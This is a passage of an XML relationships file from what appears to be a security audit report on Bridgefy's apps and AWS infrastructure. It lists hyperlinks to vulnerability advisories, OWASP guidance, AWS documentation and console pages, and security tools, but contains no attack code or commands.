TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:json-schema@0.2" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ssllabs.com/ssltest/" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-o-saft/" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/controls/SecureFlag" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/HttpOnly" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-3918" TargetMode="External"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:mongoose@6.1.8" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:ansi-regex@4.1.0" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:json5@1.0.1" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.snyk.io/package/npm/jsonwebtoken/8.5.1" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-2564" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-3807" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-46175" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:qs@6.5.2" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:minimatch@3.0.4" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:moment@2.29.1" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.snyk.io/package/npm/qs/6.5.2" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.snyk.io/package/npm/trim-newlines/3.0.0" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-3517" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.snyk.io/package/npm/moment/2.29.1" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:path-parse@1.0.6" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:yargs-parser@2.4" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:browserslist@4.16" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-56x4-j7p9-fcf9" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-v78c-4p63-2j6c" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.snyk.io/package/npm/path-parse/1.0.6" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.snyk.io/package/npm/yargs-parser/2.4.1" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-23364" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:jose@2.0.5" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-0536" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-36083" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.snyk.io/package/npm/jose/2.0.5" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.npmjs.com/cli/v7/commands/npm-audit/" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://snyk.io/" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-dependency-check/" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bridgefy/bridgefy-sdk-backend" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bridgefy/bridgefy-app-backend" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bridgefy/bridgefy-APP-infra" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/zricethezav/gitleaks" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rtyley.github.io/bfg-repo-cleaner/" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.gitguardian.com/" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/trufflesecurity/trufflehog" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/awslabs/git-secrets" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.stackexchange.com/questions/197784/is-it-unsafe-to-use-environmental-variables-for-secret-data" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aws.amazon.com/blogs/aws/aws-secrets-manager-store-distribute-and-rotate-credentials-securely/" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/798.html" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#token-sidejacking" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/JSON_Web_Token_for_Java_Cheat_Sheet.html#no-built-in-token-revocation-by-the-user" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Error_Handling_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:oscar%2Bb0@7asecurity.com" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyPassword?key=AIzaSyCc" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:oscar%2Bb2@7asecurity.com" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.googleapis.com/identitytoolkit/v3/relyingparty/signupNewUser?key=AIzaSyCco" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/Credential_stuffing" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.googleapis.com/identitytoolkit/v3/relyingparty/getOobConfirmationCode?key" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/identity-platform/docs/admin/email-enumeration-protection" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/identity-platform/docs/product-comparison" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html#authentication-and-error-messages" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.techtarget.com/searchsecurity/definition/MD5" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vulncat.fortify.com/en/detail?id=desc.semantic.cpp.weak_encryption_insecure_mode_of_operation" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cryptographically-secure_pseudorandom_number_generator" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Secure_Hash_Algorithms" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://users.ece.cmu.edu/~dbrumley/courses/18487-f13/powerpoint/19-mobile-security.pdf" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://jiang-zhenghong.github.io/blogs/PaddingOracle.html" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rules.sonarsource.com/typescript/RSPEC-2245" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/35711" TargetMode="External"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/davidqphan/DirtyCow" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Dirty_COW" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bankinfosecurity.com/jailbreaking-ios-devices-risks-to-users-enterprises-a-8515" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cocoapods.org/pods/IOSSecuritySuite" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/thii/DTTJailbreakDetection" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sabatsachin.medium.com/detect-jailbreak-device-in-swift-5-ios-programatically-da467028242d" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/securing/IOSSecuritySuite" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ryleyangus.com/repo/" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ios.jjolano.me/" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://apt.thebigboss.org/repofiles/cydia/" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://repo.rpgfarm.com/" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/scottyab/rootbeer" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-east-1.console.aws.amazon.com/iamv2/home%23/groups/details/Administradores?section=users" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-east-1.console.aws.amazon.com/iamv2/home?region=us-east-1&amp;/roles" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html#grant-least-privilege" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_generate-policy.html?icmpid=docs_iam_console" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-policy-generation.html" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nitesculucian.github.io/2019/07/01/exploiting-the-xmlrpc-php-on-all-wordpress-versions/" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wordpress.org/plugins/stop-xml-rpc-attacks/" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wordpress.org/plugins/disable-xml-rpc/" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kinsta.com/blog/xmlrpc-php/" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hostinger.com/tutorials/xmlrpc-wordpress" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wp2static.com/" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-east-1.console.aws.amazon.com/ec2globalview/home?region=us-east-1" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/securityhub/latest/userguide/securityhub-get-started.html" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_settingup.html" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aws.amazon.com/blogs/mt/aws-config-best-practices/" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aws.amazon.com/security-hub/" TargetMode="External"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/config/latest/developerguide/security-best-practices.html" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/guardduty/latest/ug/what-is-guardduty.html" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aws.amazon.com/macie/" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/inspector/v1/userguide/inspector_introduction.html" TargetMode="External"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.terraform.io/use-cases/infrastructure-as-code" TargetMode="External"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-east-1.console.aws.amazon.com/cloudtrail/home?region=us-east-1%23/events%3FUsername%3Droot&amp;CustomTime=7776000000" TargetMode="External"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/accounts/latest/reference/best-practices-root-user.html" TargetMode="External"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-east-1.console.aws.amazon.com/iamv2/home?&amp;/home" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aws.amazon.com/iam/identity-center/" TargetMode="External"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.jpeg"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-east-1.console.aws.amazon.com/iamv2/home?region=us-east-1&amp;/users" TargetMode="External"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/cloudoneconformity/knowledge-base/aws/IAM/root-hardware-mfa.html" TargetMode="External"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/config/latest/developerguide/root-account-hardware-mfa-enabled.html" TargetMode="External"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/singlesignon/latest/userguide/how-to-configure-mfa-device-enforcement.html" TargetMode="External"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aws.amazon.com/iam/features/mfa/" TargetMode="External"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-east-1.console.aws.amazon.com/iamv2/home?&amp;/credential_report" TargetMode="External"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:miguel@bridgefy.me" TargetMode="External"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.jpeg"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/accounts/latest/reference/credentials-access-keys-best-practices.html" TargetMode="External"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aws.amazon.com/premiumsupport/knowledge-center/authenticate-mfa-cli/" TargetMode="External"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-user-guide.html" TargetMode="External"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-east-1.console.aws.amazon.com/cloudwatch/home?region=us-east-1&amp;logsV2%3Alog-groups" TargetMode="External"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-east-1.console.aws.amazon.com/cloudwatch/home?region=us-east-1&amp;logsV2%3Aexport-tasks" TargetMode="External"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-east-1.console.aws.amazon.com/vpc/home?region=us-east-1&amp;VpcDetails%3AVpcId=vpc-064965b22e87fc27c" TargetMode="External"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/AmazonS3/latest/userguide/s3-incident-response.html" TargetMode="External"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/whitepapers/latest/security-overview-aws-lambda/monitoring-and-auditing-lambda-functions.html" TargetMode="External"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs-logging-monitoring.html" TargetMode="External"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/elasticloadbalancing/latest/application/load-balancer-access-logs.html" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/S3Export.html" TargetMode="External"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/vpc/latest/userguide/flow-logs.html" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/mask-sensitive-log-data.html#mask-sensitive-log-data-start" TargetMode="External"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-east-1.console.aws.amazon.com/ecr/repositories?region=us-east-1" TargetMode="External"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/whitepapers/latest/aws-security-incident-response-guide/logging-and-events.html" TargetMode="External"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpeg"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-east-1.console.aws.amazon.com/ecr/private-registry/edit-scanning?region=us-east-1" TargetMode="External"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.jpeg"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aquasecurity.github.io/tfsec/v1.8.0/checks/aws/ecr/enforce-immutable-repository/" TargetMode="External"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-east-1.console.aws.amazon.com/ec2/home?region=us-east-1&amp;LoadBalancers" TargetMode="External"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/config/latest/developerguide/alb-http-drop-invalid-header-enabled.html" TargetMode="External"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/waf/" TargetMode="External"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.android.com/training/articles/keystore" TargetMode="External"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/vulnerability-list.php?vendor_id=1224&amp;product_id=19997&amp;version_id&amp;page=1&amp;hasexp=0&amp;opdos=0&amp;opec=0&amp;opov=0&amp;opcsrf=0&amp;opgpriv=0&amp;opsqli=0&amp;opxss=0&amp;opdirt=0&amp;opmemc=0&amp;ophttprs=0&amp;opbyp=0&amp;opfileinc=0&amp;opginf=0&amp;cvssscoremin=8&amp;cvssscoremax=0&amp;year=0&amp;month=0&amp;cweid=0&amp;order=1&amp;trc=849&amp;sha=1bd76566e804bd0baf4aa6ef43598ed24565b5b6" TargetMode="External"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.android.com/topic/security/data" TargetMode="External"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/firebase/firebase-android-sdk/issues/1681" TargetMode="External"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sqlcipher/android-database-sqlcipher#using-sqlcipher-for-android-with-room" TargetMode="External"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mas.owasp.org/MASTG/Android/0x05d-Testing-Data-Storage/#sqlite-database-unencrypted" TargetMode="External"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mas.owasp.org/MASTG/Android/0x05d-Testing-Data-Storage/#keystore" TargetMode="External"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.android.com/jetpack/androidx/releases/room" TargetMode="External"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://developer.android.com/reference/android/view/View.html#setFilterTouchesWhenObscured(boolean)" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://developer.android.com/reference/android/view/View.html#attr_android%3AfilterTouchesWhenObscured" TargetMode="External"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.android.com/reference/android/view/View#security" TargetMode="External"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/vulnerability-list.php?vendor_id=1224&amp;product_id=19997&amp;version_id&amp;page=1&amp;hasexp=0&amp;opdos=0&amp;opec=0&amp;opov=0&amp;opcsrf=0&amp;opgpriv=0&amp;opsqli=0&amp;opxss=0&amp;opdirt=0&amp;opmemc=0&amp;ophttprs=0&amp;opbyp=0&amp;opfileinc=0&amp;opginf=0&amp;cvssscoremin=8&amp;cvssscoremax=0&amp;year=0&amp;month=0&amp;cweid=0&amp;order=1&amp;trc=968&amp;sha=d2f005e0a59d1049528076a1d0f311143d802d4a" TargetMode="External"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cl.cam.ac.uk/~drt24/papers/spsm-scoring.pdf" TargetMode="External"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.jpeg"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.zohoapis.com/" TargetMode="External"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aws.amazon.com/premiumsupport/knowledge-center/ecs-data-security-container-task/" TargetMode="External"/><Relationship Id="rId268" 